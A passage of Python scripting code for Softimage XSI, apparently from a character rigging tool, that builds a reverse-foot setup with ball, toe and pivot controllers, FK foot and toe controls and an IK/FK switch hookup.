defined.'\r\n\t\t\t)\r\n\t\tself.deformer_parent = dispatch(self.deformer_parent)\r\n\t\t\r\n\t\t# make sure we have the template values #\r\n\t\ttemplate = self.parent.template\r\n\t\t\t\r\n\t\t# make sure we have all items needed from the leg #\r\n\t\tif not self.con_foot:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a foot controller.'\r\n\t\t\t)\r\n\t\tif not self.con_ankle:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to leg ankle controller.'\r\n\t\t\t)\r\n\t\tif not self.ik_switch:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a leg ik switch.'\r\n\t\t\t)\r\n\t\tif not self.prop_anim:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a leg animation property.'\r\n\t\t\t)\r\n\t\tif not self.prop_anim_di:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a leg animation property (display info).'\r\n\t\t\t)\r\n\t\tif not self.root_leg_con:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a leg controller root.'\r\n\t\t\t)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# create a null to locate the foot orientation \r\n\t\tself.con_foot = dispatch(self.con_foot)\r\n\t\tnode_temp = xsi.ActiveSceneRoot.AddNull()\r\n\t\tnode_temp.Kinematics.Global.Transform = self.con_foot.node_rest.Kinematics.Global.Transform\r\n\t\t\r\n\t\t# get the global vector #\r\n\t\tv_temp_global = node_temp.Kinematics.Global.Transform.Translation\r\n\t\t\r\n\t\t# create a vector at the toe #\r\n\t\tnode_temp_toe = xsi.ActiveSceneRoot.AddNull()\r\n\t\ttrans = XSIMath.CreateTransform()\r\n\r\n\t\t# match the global y vector #\r\n\t\tv_toe_flat = XSIMath.CreateVector3()\r\n\t\tv_toe_flat.Copy(self.parent.template.v_toe)\r\n\t\tv_toe_flat.Y = v_temp_global.Y\r\n\t\ttrans.Translation = v_toe_flat\r\n\t\tnode_temp_toe.Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# aim the temp foot at the toe with a world up #\r\n\t\tcns = node_temp.Kinematics.AddConstraint('Direction', node_temp_toe, False)\r\n\t\tcns = dispatch(cns)\r\n\t\tcns.upvct_active.Value = True\r\n\r\n\t\t# set the foot rest con to this transform #\r\n\t\ttrans_foot = node_temp.Kinematics.Global.Transform\r\n\t\tif self.realign_foot_con:\r\n\t\t\tlog('Realigning the foot con to the orientation of the foot.')\r\n\t\t\tself.con_foot.node_rest.Kinematics.Global.Transform = trans_foot \r\n\t\t\r\n\t\t# remove the temp nulls #\r\n\t\txsi.DeleteObj('%s,%s' % (node_temp.FullName, 
node_temp_toe.FullName))\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# draw the REVERSE FOOT\r\n\t\r\n\t\t# calculate the plane vector #\r\n\t\tv_plane = XSIMath.CreateVector3()\r\n\t\tv1\t\t= XSIMath.CreateVector3()\r\n\t\tv2\t\t= XSIMath.CreateVector3()\r\n\t\t# get vector from root to ankle #\r\n\t\tv1.Sub(template.v_heel, template.v_ankle)\r\n\t\t# get vector from root to knee #\r\n\t\tv2.Sub(template.v_heel, template.v_toe)\r\n\t\t# get the cross product #\r\n\t\tv_plane.Cross(v1, v2)\r\n\t\r\n\t\t# draw the chain #\r\n\t\tself.root_foot_rev = self.controls_parent.Add2DChain(\r\n\t\t\ttemplate.v_heel, \r\n\t\t\ttemplate.v_toe, \r\n\t\t\tv_plane, \r\n\t\t\tc.si2DChainNormalRadian,\r\n\t\t\txsi.zMapName('footRev', 'ChainRoot', self.parent.symmetry)\r\n\t\t)\r\n\t\tself.root_foot_rev.Effector.Name = xsi.zMapName('footRev', 'ChainEff', self.parent.symmetry)\r\n\t\tself.root_foot_rev.Bones(0).Name = xsi.zMapName('footRev', 'ChainBone', self.parent.symmetry, 1)\r\n\t\t\r\n\t\t# add bones #\r\n\t\tself.root_foot_rev.AddBone(\r\n\t\t\ttemplate.v_ball, \r\n\t\t\tc.siChainBonePin,\r\n\t\t\txsi.zMapName('footRev', 'ChainBone', self.parent.symmetry, 2)\r\n\t\t)\r\n\t\tself.root_foot_rev.AddBone(\r\n\t\t\ttemplate.v_ankle, \r\n\t\t\tc.siChainBonePin,\r\n\t\t\txsi.zMapName('footRev', 'ChainBone', self.parent.symmetry, 3)\r\n\t\t)\r\n\r\n\t\t# format the bones #\r\n\t\tfmt = xsi.zChainFormatter(self.root_foot_rev)\r\n\t\tif re.match(r'^left$', self.parent.symmetry, re.I):\r\n\t\t\tfmt.BoneDisplay = 0\r\n\t\t\tfmt.BoneSize\t= self.parent.scale\r\n\t\t\tfmt.BoneR\t\t= 0\r\n\t\t\tfmt.BoneG\t\t= 1\r\n\t\t\tfmt.BoneB\t\t= 0\r\n\t\t\tfmt.BoneWireR\t= 0\r\n\t\t\tfmt.BoneWireG\t= 1\r\n\t\t\tfmt.BoneWireB\t= 0\r\n\t\t\t\r\n\t\t\tfmt.RootDisplay = 0\r\n\t\t\tfmt.RootSize\t= self.parent.scale\r\n\t\t\tfmt.RootR\t\t= 0\r\n\t\t\tfmt.RootG\t\t= 1\r\n\t\t\tfmt.RootB\t\t= 0\r\n\t\t\tfmt.RootWireR\t= 0\r\n\t\t\tfmt.RootWireG\t= 1\r\n\t\t\tfmt.RootWireB\t= 0\r\n\r\n\t\t\tfmt.EffDisplay \t= 0\r\n\t\t\tfmt.EffSize\t\t= self.parent.scale\r\n\t\t\tfmt.EffR\t\t= 0\r\n\t\t\tfmt.EffG\t\t= 1\r\n\t\t\tfmt.EffB\t\t= 0\r\n\t\t\tfmt.EffWireR\t= 0\r\n\t\t\tfmt.EffWireG\t= 1\r\n\t\t\tfmt.EffWireB\t= 0\r\n\t\t\t\r\n\t\t\tfmt.EffLastBone\t= True\r\n\t\telse: \r\n\t\t\tfmt.BoneDisplay = 0\r\n\t\t\tfmt.BoneSize\t= self.size_fk_cons\r\n\t\t\tfmt.BoneR\t\t= 1\r\n\t\t\tfmt.BoneG\t\t= 0\r\n\t\t\tfmt.BoneB\t\t= 0\r\n\t\t\tfmt.BoneWireR\t= 1\r\n\t\t\tfmt.BoneWireG\t= 0\r\n\t\t\tfmt.BoneWireB\t= 0\r\n\t\t\t\r\n\t\t\tfmt.RootDisplay = 0\r\n\t\t\tfmt.RootSize\t= self.size_fk_cons\r\n\t\t\tfmt.RootR\t\t= 1\r\n\t\t\tfmt.RootG\t\t= 0\r\n\t\t\tfmt.RootB\t\t= 0\r\n\t\t\tfmt.RootWireR\t= 1\r\n\t\t\tfmt.RootWireG\t= 0\r\n\t\t\tfmt.RootWireB\t= 0\r\n\r\n\t\t\tfmt.EffDisplay \t= 0\r\n\t\t\tfmt.EffSize\t\t= self.size_fk_cons\r\n\t\t\tfmt.EffR\t\t= 1\r\n\t\t\tfmt.EffG\t\t= 0\r\n\t\t\tfmt.EffB\t\t= 0\r\n\t\t\tfmt.EffWireR\t= 1\r\n\t\t\tfmt.EffWireG\t= 0\r\n\t\t\tfmt.EffWireB\t= 0\r\n\t\t\t\r\n\t\t\tfmt.EffLastBone\t= True\r\n\r\n\t\tfmt.Format()\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# contrain the reverse foot to the controller #\r\n\t\tself.con_foot = dispatch(self.con_foot)\r\n\t\tself.root_foot_rev.Kinematics.AddConstraint('Pose', self.con_foot.node_hook, True)\r\n\r\n\t\t# constrain the ankle rest to the reverse foot effector #\r\n\t\tself.con_ankle = dispatch(self.con_ankle)\r\n\t\tself.con_ankle.node_rest.Kinematics.AddConstraint('Position', 
self.root_foot_rev.Effector, False)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add the BALL controller\r\n\t\tself.con_ball \t\t\t\t\t\t= xsi.zCon()\r\n\t\tself.con_ball.type \t\t\t\t\t= 'round_box'\r\n\t\tself.con_ball.size \t\t\t\t\t= self.size_ball_con * self.parent.scale\r\n\t\tself.con_ball.transform.Translation = self.root_foot_rev.Bones(2).Kinematics.Global.Transform.Translation\r\n\t\tself.con_ball.transform.Rotation\t= trans_foot.Rotation\r\n\t\tself.con_ball.basename \t\t\t\t= 'Ball'\r\n\t\tself.con_ball.symmetry \t\t\t\t= self.parent.symmetry\r\n\t\tself.con_ball.parent_node \t\t\t= self.con_foot.node_hook\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_ball.red \t\t\t\t= 0.8\r\n\t\t\tself.con_ball.green \t\t\t= 0\r\n\t\t\tself.con_ball.blue \t\t\t\t= 0\r\n\t\telse: \t\t\r\n\t\t\tself.con_ball.red \t\t\t\t= 0\r\n\t\t\tself.con_ball.green \t\t\t= 0.8\r\n\t\t\tself.con_ball.blue \t\t\t\t= 0\r\n\t\tself.con_ball.Draw()\r\n\t\tself.con_ball.AddTransformSetupPos('local')\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add the TOE controller\r\n\t\tself.con_toe \t\t\t\t\t\t= xsi.zCon()\r\n\t\tself.con_toe.type \t\t\t\t\t= 'round_box'\r\n\t\tself.con_toe.size \t\t\t\t\t= self.size_toe_con * self.parent.scale\r\n\t\tself.con_toe.transform.Translation \t= self.root_foot_rev.Bones(1).Kinematics.Global.Transform.Translation\r\n\t\tself.con_toe.transform.Rotation\t\t= trans_foot.Rotation\r\n\t\tself.con_toe.basename \t\t\t\t= 'Toe'\r\n\t\tself.con_toe.symmetry \t\t\t\t= self.parent.symmetry\r\n\t\tself.con_toe.parent_node \t\t\t= self.con_foot.node_hook\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_toe.red \t \t\t\t= 0.8\r\n\t\t\tself.con_toe.green \t \t\t\t= 0\r\n\t\t\tself.con_toe.blue \t \t\t\t= 0\r\n\t\telse: \t\t\t\r\n\t\t\tself.con_toe.red \t \t\t\t= 0\r\n\t\t\tself.con_toe.green \t \t\t\t= 0.8\r\n\t\t\tself.con_toe.blue \t \t\t\t= 0\r\n\t\tself.con_toe.Draw()\r\n\t\tself.con_toe.AddTransformSetupPos('local')\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_ball.node_con)\r\n\t\t\tself.group_controls.AddMember(self.con_toe.node_con)\r\n\t\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# create up vectors for the feet\r\n\t\t\r\n\t\t# foot #\r\n\t\tupv_foot = self.con_foot.node_hook.AddNull(\r\n\t\t\txsi.zMapName('Foot', 'UpVector', self.parent.symmetry)\r\n\t\t)\r\n\t\tupv_foot.primary_icon.Value = 0\r\n\t\tupv_foot.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tupv_foot.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\ttrans = self.root_foot_rev.Bones(2).Kinematics.Global.Transform\r\n\t\ttrans.AddLocalTranslation(XSIMath.CreateVector3(-50*self.parent.scale, 50*self.parent.scale, 0))\r\n\t\tupv_foot.Kinematics.Global.Transform = trans\r\n\t\r\n\t\t# toe #\r\n\t\tupv_toe = self.con_ball.node_hook.AddNull(\r\n\t\t\txsi.zMapName('Toe', 'UpVector', self.parent.symmetry)\r\n\t\t)\r\n\t\tupv_toe.primary_icon.Value = 0\r\n\t\tupv_toe.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tupv_toe.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\ttrans = self.root_foot_rev.Bones(1).Kinematics.Global.Transform\r\n\t\ttrans.AddLocalTranslation(XSIMath.CreateVector3(50*self.parent.scale, 
70*self.parent.scale, 0))\r\n\t\tupv_toe.Kinematics.Global.Transform = trans\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# Draw the foot fk control setup\r\n\t\tself.root_leg_con = dispatch(self.root_leg_con)\r\n\t\t\r\n\t\tself.con_foot_fk \t\t\t\t= xsi.zCon()\r\n\t\tself.con_foot_fk.type \t\t\t= 'box'\r\n\t\tself.con_foot_fk.size \t\t\t= self.size_fk_cons * self.parent.scale\r\n\t\tself.con_foot_fk.transform \t\t= self.root_leg_con.Effector.Kinematics.Global.Transform\r\n\t\tself.con_foot_fk.basename \t\t= 'FootFk'\r\n\t\tself.con_foot_fk.symmetry \t\t= self.parent.symmetry\r\n\t\tself.con_foot_fk.parent_node \t= self.controls_parent\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_foot_fk.red \t\t= 1\r\n\t\t\tself.con_foot_fk.green \t\t= 0\r\n\t\t\tself.con_foot_fk.blue \t\t= 0\r\n\t\telse: \r\n\t\t\tself.con_foot_fk.red \t\t= 0\r\n\t\t\tself.con_foot_fk.green \t\t= 1\r\n\t\t\tself.con_foot_fk.blue \t\t= 0\r\n\t\tself.con_foot_fk.Draw()\r\n\t\tself.con_foot_fk.AddTransformSetupRot('add')\r\n\t\t\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_foot_fk.node_con)\r\n\r\n\t\t# constrain it to the effector of the control leg #\r\n\t\tself.con_foot_fk.node_rest.Kinematics.AddConstraint('Pose', self.root_leg_con.Effector, True)\r\n\r\n\t\t# create a spacer node to help fix direction constraint blending issues #\r\n\t\t# Note: do nothing with this node #\r\n\t\tnode_foot_spacer = self.con_foot_fk.node_rest.AddNull(xsi.zMapName('FootFk', 'Zero', self.parent.symmetry))\r\n\t\tnode_foot_spacer.primary_icon.Value = 0\r\n\t\tnode_foot_spacer.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_foot_spacer.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_foot_spacer.Kinematics.Global.Transform = node_foot_spacer.parent.Kinematics.Global.Transform\r\n\t\tnode_foot_spacer.AddChild(self.con_foot_fk.node_con)\r\n\r\n\t\t# aim it #\r\n\t\tcns_foot_fk = self.con_foot_fk.node_con.Kinematics.AddConstraint('Direction', self.con_ball.node_hook, False)\r\n\t\tcns_foot_fk = dispatch(cns_foot_fk)\r\n\t\tcns_foot_fk.upvct_active.Value = True\r\n\t\tcns_foot_fk.UpVectorReference = upv_foot\r\n\t\t\r\n\t\t# calculate the size #\r\n\t\tv_len \t= XSIMath.CreateVector3()\r\n\t\tv1\t\t= self.con_foot_fk.node_con.Kinematics.Global.Transform.Translation\r\n\t\tv2\t\t= self.con_ball.node_con.Kinematics.Global.Transform.Translation\r\n\t\t# calculate the length #\r\n\t\tv_len.Sub(v2,v1)\r\n\t\tlength \t= v_len.Length()\r\n\t\t# get the point array of the controller #\r\n\t\tpa = list(self.con_foot_fk.node_con.ActivePrimitive.Geometry.Points.PositionArray)\r\n\t\tpa[0] = list(pa[0])\r\n\t\tpa[1] = list(pa[1])\r\n\t\tpa[2] = list(pa[2])\r\n\t\t# shift all the points #\r\n\t\tfor p in xrange(len(pa[0])):\r\n\t\t\t# scale the points #\r\n\t\t\tpa[0][p] *= length/(self.size_fk_cons * self.parent.scale)\r\n\t\t\tpa[1][p] *= (self.size_fk_cons * self.parent.scale)\r\n\t\t\tpa[2][p] *= (self.size_fk_cons * self.parent.scale)\r\n\r\n\t\t\t# shift them down the X axis #\r\n\t\t\tpa[0][p] += length/2\r\n\r\n\t\t# put the points back on the array #\r\n\t\tself.con_foot_fk.node_con.ActivePrimitive.Geometry.Points.PositionArray = pa\r\n\r\n\t\t# set the neutral pose #\r\n\t\txsi.SetNeutralPose(self.con_foot_fk.node_con, c.siSRT, False)\r\n\r\n\t\t# set default keys, blend constraints need something to blend to 
#\r\n\t\tself.con_foot_fk.node_con.Kinematics.Local.RotX.AddFcurve2([0,0])\r\n\t\tself.con_foot_fk.node_con.Kinematics.Local.RotY.AddFcurve2([0,0])\r\n\t\tself.con_foot_fk.node_con.Kinematics.Local.RotZ.AddFcurve2([0,0])\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# Draw the toe fk control setup\r\n\t\tself.con_toe_fk \t\t\t\t= xsi.zCon()\r\n\t\tself.con_toe_fk.type \t\t\t= 'box'\r\n\t\tself.con_toe_fk.size \t\t\t= self.size_fk_cons * self.parent.scale\r\n\t\tself.con_toe_fk.transform \t\t= self.con_ball.node_con.Kinematics.Global.Transform\r\n\t\tself.con_toe_fk.basename \t\t= 'ToeFk'\r\n\t\tself.con_toe_fk.symmetry \t\t= self.parent.symmetry\r\n\t\tself.con_toe_fk.parent_node \t= self.con_foot_fk.node_hook\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_toe_fk.red \t\t= 1\r\n\t\t\tself.con_toe_fk.green \t\t= 0\r\n\t\t\tself.con_toe_fk.blue \t\t= 0\r\n\t\telse: \r\n\t\t\tself.con_toe_fk.red \t\t= 0\r\n\t\t\tself.con_toe_fk.green \t\t= 1\r\n\t\t\tself.con_toe_fk.blue \t\t= 0\r\n\t\tself.con_toe_fk.Draw()\r\n\t\tself.con_toe_fk.AddTransformSetupRot('add')\r\n\t\t\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_toe_fk.node_con)\r\n\r\n\t\t# create a spacer node to help fix direction constraint blending issues #\r\n\t\t# Note: do nothing with this node #\r\n\t\tnode_toe_spacer = self.con_toe_fk.node_rest.AddNull(xsi.zMapName('ToeFk', 'Zero', self.parent.symmetry))\r\n\t\tnode_toe_spacer.primary_icon.Value = 0\r\n\t\tnode_toe_spacer.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_toe_spacer.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_toe_spacer.Kinematics.Global.Transform = node_toe_spacer.parent.Kinematics.Global.Transform\r\n\t\tnode_toe_spacer.AddChild(self.con_toe_fk.node_con)\r\n\t\t\r\n\t\t# aim it #\r\n\t\tcns_toe_fk = self.con_toe_fk.node_con.Kinematics.AddConstraint('Direction', self.con_toe.node_hook, False)\r\n\t\tcns_toe_fk = dispatch(cns_toe_fk)\r\n\t\tcns_toe_fk.upvct_active.Value = True\r\n\t\tcns_toe_fk.UpVectorReference = upv_toe\r\n\t\t\r\n\t\t# calculate the size #\r\n\t\tv_len \t= XSIMath.CreateVector3()\r\n\t\tv1\t\t= self.con_toe_fk.node_con.Kinematics.Global.Transform.Translation\r\n\t\tv2\t\t= self.con_toe.node_con.Kinematics.Global.Transform.Translation\r\n\t\t# calculate the length #\r\n\t\tv_len.Sub(v2,v1)\r\n\t\tlength \t= v_len.Length()\r\n\t\t# get the point array of the controller #\r\n\t\tpa = list(self.con_toe_fk.node_con.ActivePrimitive.Geometry.Points.PositionArray)\r\n\t\tpa[0] = list(pa[0])\r\n\t\tpa[1] = list(pa[1])\r\n\t\tpa[2] = list(pa[2])\r\n\t\t# shift all the points #\r\n\t\tfor p in xrange(len(pa[0])):\r\n\t\t\t# scale the points #\r\n\t\t\tpa[0][p] *= length/(self.size_fk_cons * self.parent.scale)\r\n\t\t\tpa[1][p] *= (self.size_fk_cons * self.parent.scale)\r\n\t\t\tpa[2][p] *= (self.size_fk_cons * self.parent.scale)\r\n\r\n\t\t\t# shift them down the X axis #\r\n\t\t\tpa[0][p] += length/2\r\n\r\n\t\t# put the points back on the array #\r\n\t\tself.con_toe_fk.node_con.ActivePrimitive.Geometry.Points.PositionArray = pa\r\n\t\t\r\n\t\t# set the neutral pose #\r\n\t\txsi.SetNeutralPose(self.con_toe_fk.node_con, c.siSRT, False)\r\n\t\t\r\n\t\t# set default keys, blend constraints need something to blend to 
#\r\n\t\tself.con_toe_fk.node_con.Kinematics.Local.RotX.AddFcurve2([0,0])\r\n\t\tself.con_toe_fk.node_con.Kinematics.Local.RotY.AddFcurve2([0,0])\r\n\t\tself.con_toe_fk.node_con.Kinematics.Local.RotZ.AddFcurve2([0,0])\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add transform setups \r\n\t\t\r\n\t\t# foot #\r\n\t\tts = self.con_foot_fk.node_con.AddProperty('Transform Setup', False)\r\n\t\tts = dispatch(ts)\r\n\t\tts.tool.Value = 3\r\n\t\tts.rotate.Value = 3\r\n\t\tts.xaxis.Value = True\r\n\t\tts.yaxis.Value = True\r\n\t\tts.zaxis.Value = True\r\n\t\t\r\n\t\t# toe #\r\n\t\tts = self.con_toe_fk.node_con.AddProperty('Transform Setup', False)\r\n\t\tts = dispatch(ts)\r\n\t\tts.tool.Value = 3\r\n\t\tts.rotate.Value = 3\r\n\t\tts.xaxis.Value = True\r\n\t\tts.yaxis.Value = True\r\n\t\tts.zaxis.Value = True\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# draw the foot skeleton\r\n\t\t\r\n\t\t# calculate the plane vector #\r\n\t\tv_plane = XSIMath.CreateVector3()\r\n\t\tv1\t\t= XSIMath.CreateVector3()\r\n\t\tv2\t\t= XSIMath.CreateVector3()\r\n\t\t# get vector from root to ankle #\r\n\t\tv1.Sub(template.v_ankle, template.v_ball)\r\n\t\t# get vector from root to knee #\r\n\t\tv2.Sub(template.v_ankle, template.v_toe)\r\n\t\t# get the cross product #\r\n\t\tv_plane.Cross(v1, v2)\r\n\t\t\r\n\t\t# draw the skeleton #\r\n\t\tself.root_foot = self.skeleton_parent.Add2DChain(\r\n\t\t\ttemplate.v_ankle,\r\n\t\t\ttemplate.v_ball,\r\n\t\t\tv_plane,\r\n\t\t\tc.si2DChainNormalRadian\r\n\t\t)\r\n\t\t\r\n\t\t# rename #\r\n\t\tself.root_foot.Name \t\t\t= xsi.zMapName(self.parent.basename, 'ChainRoot', self.parent.symmetry)\r\n\t\tself.root_foot.Bones(0).Name \t= xsi.zMapName(self.parent.basename, 'ChainBone', self.parent.symmetry, 1)\r\n\t\tself.root_foot.effector.Name \t= xsi.zMapName(self.parent.basename, 'ChainEff', self.parent.symmetry)\r\n\t\t\r\n\t\t# draw the shin #\r\n\t\tself.root_foot.AddBone(\r\n\t\t\ttemplate.v_toe,\r\n\t\t\tc.siChainBonePin,\r\n\t\t\txsi.zMapName(self.parent.basename, 'ChainBone', self.parent.symmetry, 2)\r\n\t\t)\r\n\t\t\r\n\t\t# put the effector under the last bone #\r\n\t\tself.root_foot.Bones(1).AddChild(self.root_foot.effector)\r\n\t\t\r\n\t\t# align the chain root #\r\n\t\ttrans =self.root_foot.Bones(0).Kinematics.Global.Transform\r\n\t\tself.root_foot.Kinematics.Global.Transform =self.root_foot.Bones(0).Kinematics.Global.Transform\r\n\t\tself.root_foot.Bones(0).Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# format the chain colors\r\n\t\tfmt = xsi.zChainFormatter(self.root_foot)\r\n\t\tfmt.Format()\r\n\t\t\r\n\t\t# set neutral pose on foot joints\r\n\t\tfor bone in self.root_foot.Bones:\r\n\t\t\tbone = dispatch(bone)\r\n\t\t\t# set the neutral pose #\r\n\t\t\txsi.SetNeutralPose(bone, c.siSRT, False)\r\n\t\t\r\n\t\t# constraints + bones don't mix, but expressions do! 
#\r\n\t\tself.root_foot.Bones(0).Kinematics.Global.RotX.AddExpression(\r\n\t\t\tself.con_foot_fk.node_con.Kinematics.Global.RotX.FullName\r\n\t\t) \r\n\t\tself.root_foot.Bones(0).Kinematics.Global.RotY.AddExpression(\r\n\t\t\tself.con_foot_fk.node_con.Kinematics.Global.RotY.FullName\r\n\t\t) \r\n\t\tself.root_foot.Bones(0).Kinematics.Global.RotZ.AddExpression(\r\n\t\t\tself.con_foot_fk.node_con.Kinematics.Global.RotZ.FullName\r\n\t\t) \r\n\t\t\r\n\t\tself.root_foot.Bones(1).Kinematics.Global.RotX.AddExpression(\r\n\t\t\tself.con_toe_fk.node_con.Kinematics.Global.RotX.FullName\r\n\t\t) \r\n\t\tself.root_foot.Bones(1).Kinematics.Global.RotY.AddExpression(\r\n\t\t\tself.con_toe_fk.node_con.Kinematics.Global.RotY.FullName\r\n\t\t) \r\n\t\tself.root_foot.Bones(1).Kinematics.Global.RotZ.AddExpression(\r\n\t\t\tself.con_toe_fk.node_con.Kinematics.Global.RotZ.FullName\r\n\t\t) \r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# hook up the cons to the reverse foot \r\n\t\tself.con_ankle.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Effector, True)\r\n\r\n\t\tself.con_toe.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Bones(1), True)\r\n\r\n\t\tself.con_ball.node_rest.Kinematics.AddConstraint('Pose', self.root_foot_rev.Bones(2), True)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add a toe pivot \r\n\t\tself.con_toe_pivot \t\t\t\t\t\t= xsi.zCon()\r\n\t\tself.con_toe_pivot.type \t\t\t\t= 'rot'\r\n\t\tself.con_toe_pivot.size \t\t\t\t= self.size_toe_pivot_con * self.parent.scale\r\n\t\tself.con_toe_pivot.transform \t\t\t= self.root_foot_rev.Bones(1).Kinematics.Global.Transform\r\n\t\tself.con_toe_pivot.transform.AddLocalRotation(\r\n\t\t\tXSIMath.CreateRotation(0, 0, XSIMath.DegreesToRadians(180))\r\n\t\t)\r\n\t\tself.con_toe_pivot.basename \t\t\t= 'ToePivot'\r\n\t\tself.con_toe_pivot.symmetry \t\t\t= self.parent.symmetry\r\n\t\tself.con_toe_pivot.parent_node \t\t\t= self.controls_parent\r\n\t\tself.con_toe_pivot.rotation_order \t\t= 'zyx'\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_toe_pivot.red \t\t\t\t= 0.8\r\n\t\t\tself.con_toe_pivot.green \t\t\t= 0\r\n\t\t\tself.con_toe_pivot.blue \t\t\t= 0\r\n\t\telse: \t\r\n\t\t\tself.con_toe_pivot.red \t\t\t\t= 0\r\n\t\t\tself.con_toe_pivot.green \t\t\t= 0.8\r\n\t\t\tself.con_toe_pivot.blue \t\t\t= 0\r\n\t\tself.con_toe_pivot.Draw()\r\n\t\tself.con_toe_pivot.AddTransformSetupRot('add', False, False, True) # only z axis\r\n\t\t\r\n\t\t# move the controller points down a bit #\r\n\t\tself.con_toe_pivot.Offset(0, self.parent.scale, 0)\r\n\t\t\r\n\t\t# constrain the reverse foot bone to the pivot controller #\r\n\t\tself.root_foot_rev.Bones(1).Kinematics.AddConstraint('Pose', self.con_toe_pivot.node_con, True)\r\n\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_toe_pivot.node_con)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add a ball pivot \r\n\t\tself.con_ball_pivot\t\t\t\t\t= xsi.zCon()\r\n\t\tself.con_ball_pivot.type \t\t\t= 'rot'\r\n\t\tself.con_ball_pivot.size \t\t\t= self.size_ball_pivot_con * 
self.parent.scale\r\n\t\tself.con_ball_pivot.transform \t\t= self.root_foot_rev.Bones(2).Kinematics.Global.Transform\r\n\t\tself.con_ball_pivot.transform.Rotation = self.con_toe_pivot.node_con.Kinematics.Global.Transform.Rotation\r\n\t\tself.con_ball_pivot.basename \t\t= 'BallPivot'\r\n\t\tself.con_ball_pivot.symmetry \t\t= self.parent.symmetry\r\n\t\tself.con_ball_pivot.parent_node \t= self.con_toe_pivot.node_hook\r\n\t\tself.con_ball_pivot.rotation_order = 'zyx'\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I):\r\n\t\t\tself.con_ball_pivot.red \t\t= 0.8\r\n\t\t\tself.con_ball_pivot.green \t\t= 0\r\n\t\t\tself.con_ball_pivot.blue \t\t= 0\r\n\t\telse: \r\n\t\t\tself.con_ball_pivot.red \t\t= 0\r\n\t\t\tself.con_ball_pivot.green \t\t= 0.8\r\n\t\t\tself.con_ball_pivot.blue \t\t= 0\r\n\t\tself.con_ball_pivot.Draw()\r\n\t\tself.con_ball_pivot.AddTransformSetupRot('add', False, False, True) # only z axis\r\n\t\t\r\n\t\t# move the controller points down a bit #\r\n\t\tself.con_ball_pivot.Offset(0, self.parent.scale, 0)\r\n\t\t\r\n\t\t# constrain the reverse foot to the constraint #\r\n\t\tself.root_foot_rev.Bones(2).Kinematics.AddConstraint('Pose', self.con_ball_pivot.node_con, True)\r\n\t\t\r\n\t\t# add to the control group \r\n\t\tif self.group_controls:\r\n\t\t\tself.group_controls.AddMember(self.con_ball_pivot.node_con)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# hook up foot to Ik/Fk switch\r\n\t\tself.ik_switch = dispatch(self.ik_switch)\r\n\t\tcns_foot_fk.blendweight.AddExpression(self.ik_switch.FullName)\r\n\t\tcns_toe_fk.blendweight.AddExpression(self.ik_switch.FullName)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add items to the animation parameters\r\n\t\tself.prop_anim = dispatch(self.prop_anim)\r\n\t\tself.prop_anim.AddParameter3('ShowBallPivot', c.siBool, False, None, None, True, False)\r\n\t\tself.prop_anim.AddParameter3('ShowToePivot', c.siBool, False, None, None, True, False)\r\n\r\n\t\tself.prop_anim_di = dispatch(self.prop_anim_di)\r\n\t\tself.prop_anim_di.AddProxyParameter('%s.ShowBallPivot' % self.prop_anim.FullName)\r\n\t\tself.prop_anim_di.AddProxyParameter('%s.ShowToePivot' % self.prop_anim.FullName)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# hook up the parameters to the scene items #\r\n\t\t\r\n\t\t# visibillity 